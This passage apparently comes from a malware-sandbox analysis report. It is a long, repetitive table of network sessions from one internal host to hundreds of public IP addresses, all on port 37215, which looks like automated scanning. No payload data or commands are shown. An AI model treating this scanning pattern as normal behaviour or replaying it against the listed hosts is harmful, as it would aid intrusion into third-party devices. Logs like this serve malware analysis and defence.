                                              22977192.168.2.154888094.79.19.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22978192.168.2.1536024156.67.100.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22979192.168.2.153479637.243.237.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22980192.168.2.1536598122.72.112.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22981192.168.2.1534190222.34.29.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22982192.168.2.153365445.239.69.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22983192.168.2.155902837.58.175.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22984192.168.2.1560942186.154.30.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22985192.168.2.1551210186.64.81.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22986192.168.2.1539334190.51.165.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22987192.168.2.1533108181.230.49.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22988192.168.2.1545892190.59.226.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22989192.168.2.155912694.232.96.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22990192.168.2.155628445.29.249.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22991192.168.2.1533144186.153.236.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22992192.168.2.1533030122.216.16.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22993192.168.2.1554048102.153.46.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22994192.168.2.1541890186.43.65.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22995192.168.2.1543244122.44.178.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22996192.168.2.1539824102.22.249.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22997192.168.2.1556612157.192.112.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22998192.168.2.1545192197.145.255.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22999192.168.2.1540118190.190.144.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23000192.168.2.1538920102.115.224.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23001192.168.2.1540082156.190.21.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23002192.168.2.1555970121.230.243.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23003192.168.2.154918037.148.35.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23004192.168.2.1532894181.135.152.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23005192.168.2.1539606122.95.149.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23006192.168.2.155354894.27.54.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23007192.168.2.155114894.137.187.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23008192.168.2.154736237.178.169.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23009192.168.2.1546786186.53.166.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23010192.168.2.1546064190.171.7.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23011192.168.2.1547708122.72.250.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23012192.168.2.1545994157.26.53.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23013192.168.2.1534450121.89.240.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23014192.168.2.154643041.94.184.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23015192.168.2.1542944157.30.153.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23016192.168.2.153775237.214.102.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23017192.168.2.155286431.35.44.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23018192.168.2.1534366102.43.198.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23019192.168.2.154640841.144.60.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23020192.168.2.1554516190.242.120.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23021192.168.2.1545234181.221.6.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23022192.168.2.1556802197.194.157.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23023192.168.2.1549900166.215.171.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23024192.168.2.1544980190.17.49.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23025192.168.2.1545418190.98.226.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23026192.168.2.154321037.225.128.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23027192.168.2.1536856157.229.35.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23028192.168.2.1543216121.194.110.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23029192.168.2.1538598138.225.201.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23030192.168.2.1534572156.12.191.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23031192.168.2.1539750156.77.51.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23032192.168.2.154857494.82.18.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23033192.168.2.155741631.18.211.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23034192.168.2.1548372190.17.174.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23035192.168.2.1554054102.51.95.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23036192.168.2.156086645.211.245.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23037192.168.2.1536180190.223.132.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23038192.168.2.1537650138.30.48.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23039192.168.2.1548322222.158.243.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23040192.168.2.1550660121.172.249.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23041192.168.2.155255694.49.100.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23042192.168.2.153780694.72.227.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23043192.168.2.1543874102.82.232.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23044192.168.2.1535190197.96.97.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23045192.168.2.1555630121.100.249.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23046192.168.2.1533348139.242.135.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23047192.168.2.1538660102.225.215.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23048192.168.2.1549154186.179.131.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23049192.168.2.1559716102.206.46.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23050192.168.2.1545924190.161.71.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23051192.168.2.1550900157.220.223.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23052192.168.2.1541532138.158.151.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23053192.168.2.1539088102.37.244.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23054192.168.2.1550006181.239.16.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23055192.168.2.154039894.109.162.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23056192.168.2.1552290156.66.174.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23057192.168.2.1557786138.99.179.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23058192.168.2.1558376156.164.210.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23059192.168.2.1556860121.207.126.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23060192.168.2.153721845.235.124.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23061192.168.2.1536102122.86.92.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23062192.168.2.155791231.139.39.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23063192.168.2.155234031.34.7.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23064192.168.2.154432837.54.86.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23065192.168.2.154613245.197.100.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23066192.168.2.1543034132.8.71.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23067192.168.2.1547114102.140.236.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23068192.168.2.1537360190.72.220.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23069192.168.2.1539446222.3.4.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23070192.168.2.1552418198.166.211.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23071192.168.2.1550400190.125.246.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23072192.168.2.153572441.180.14.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23073192.168.2.1555264138.57.2.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23074192.168.2.155793845.119.141.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23075192.168.2.1539716149.2.173.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23076192.168.2.154070894.208.96.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23077192.168.2.1534504186.175.209.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23078192.168.2.154023494.50.132.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23079192.168.2.1537178197.8.73.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23080192.168.2.153467294.59.139.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23081192.168.2.155111845.99.227.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23082192.168.2.1545780157.26.43.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23083192.168.2.154071237.238.184.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23084192.168.2.155685231.11.169.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23085192.168.2.15473508.192.199.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23086192.168.2.1554560138.10.134.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23087192.168.2.1544018181.116.178.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23088192.168.2.1538946197.50.79.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23089192.168.2.155718631.86.123.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23090192.168.2.1533642121.35.103.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23091192.168.2.153427637.92.195.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23092192.168.2.1547050157.246.210.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23093192.168.2.1535330122.149.165.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23094192.168.2.1552856186.78.229.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23095192.168.2.1534132186.242.45.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23096192.168.2.153958041.104.124.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23097192.168.2.153691037.173.152.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23098192.168.2.154681294.236.71.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23099192.168.2.1547572157.202.16.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23100192.168.2.1534144157.3.4.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23101192.168.2.1544762197.86.91.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23102192.168.2.154908037.147.53.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23103192.168.2.1541376181.107.151.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23104192.168.2.1545980102.239.60.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23105192.168.2.1534044222.239.156.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23106192.168.2.1542140181.178.102.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23107192.168.2.1556720186.185.213.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23108192.168.2.1540224186.165.87.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23109192.168.2.1537236102.97.226.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23110192.168.2.1539754157.247.108.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23111192.168.2.1536900197.239.105.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23112192.168.2.1545128157.172.69.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23113192.168.2.1537946186.227.218.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23114192.168.2.156050494.103.229.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23115192.168.2.154127045.243.150.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23116192.168.2.1545336197.66.43.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23117192.168.2.154298894.210.155.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23118192.168.2.1542370186.192.169.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23119192.168.2.1560876181.185.125.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23120192.168.2.1559622181.177.12.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23121192.168.2.1552024186.59.118.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23122192.168.2.155686845.31.19.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23123192.168.2.1550252186.198.9.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23124192.168.2.1550328138.123.99.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23125192.168.2.153462837.158.254.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23126192.168.2.1560110122.0.21.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23127192.168.2.1542586157.166.50.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23128192.168.2.153456037.163.157.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23129192.168.2.1539044181.88.209.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23130192.168.2.1540828186.87.88.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23131192.168.2.1540852156.151.26.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23132192.168.2.1557606197.224.18.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23133192.168.2.1553540222.80.109.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23134192.168.2.1543994157.91.88.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23135192.168.2.155414431.242.22.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23136192.168.2.1535456102.8.149.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23137192.168.2.1554728122.190.78.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23138192.168.2.153544694.116.37.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23139192.168.2.1541164186.221.222.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23140192.168.2.1559474156.68.255.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23141192.168.2.1544236186.16.244.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23142192.168.2.1558606154.193.47.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23143192.168.2.1538034156.125.186.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23144192.168.2.1550624222.225.158.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23145192.168.2.1535024138.140.46.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23146192.168.2.154482241.151.242.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23147192.168.2.155276841.24.106.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23148192.168.2.1533730181.148.58.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23149192.168.2.1551990157.79.208.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23150192.168.2.1539438102.210.23.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23151192.168.2.1551904181.93.73.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23152192.168.2.1539718186.62.189.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23153192.168.2.1553062186.132.75.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23154192.168.2.1542278122.192.224.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23155192.168.2.155575494.121.147.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23156192.168.2.1553974138.171.5.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23157192.168.2.1546126197.176.171.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23158192.168.2.1533210122.240.139.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23159192.168.2.1538758102.167.241.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23160192.168.2.1537780157.205.83.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23161192.168.2.1545948122.173.211.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23162192.168.2.1554188122.211.19.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23163192.168.2.1550166156.212.55.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23164192.168.2.1554684186.76.49.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23165192.168.2.1547218157.251.93.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23166192.168.2.154322437.135.154.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23167192.168.2.1539860186.205.137.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23168192.168.2.1538586138.94.221.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23169192.168.2.1538684157.246.43.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23170192.168.2.1533850197.151.121.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23171192.168.2.1560724122.124.234.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23172192.168.2.1534974186.166.115.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23173192.168.2.153811294.55.97.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23174192.168.2.1534862156.155.235.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23175192.168.2.153574841.46.66.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23176192.168.2.154858694.27.11.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23177192.168.2.1547806197.37.162.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23178192.168.2.154829631.113.138.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23179192.168.2.1553372222.111.16.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23180192.168.2.1552730186.118.107.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23181192.168.2.1560558138.181.34.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23182192.168.2.1546996222.241.61.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23183192.168.2.1544494156.172.49.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23184192.168.2.1558738102.98.251.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23185192.168.2.154064494.199.217.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23186192.168.2.155486431.145.238.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23187192.168.2.153395431.104.42.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23188192.168.2.1547064156.236.68.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23189192.168.2.1537938122.242.19.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23190192.168.2.153733041.1.134.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23191192.168.2.1557774122.220.88.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192192.168.2.154299845.217.168.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23193192.168.2.1533840157.183.238.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23194192.168.2.1559210156.92.97.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23195192.168.2.1556408102.207.98.24737215
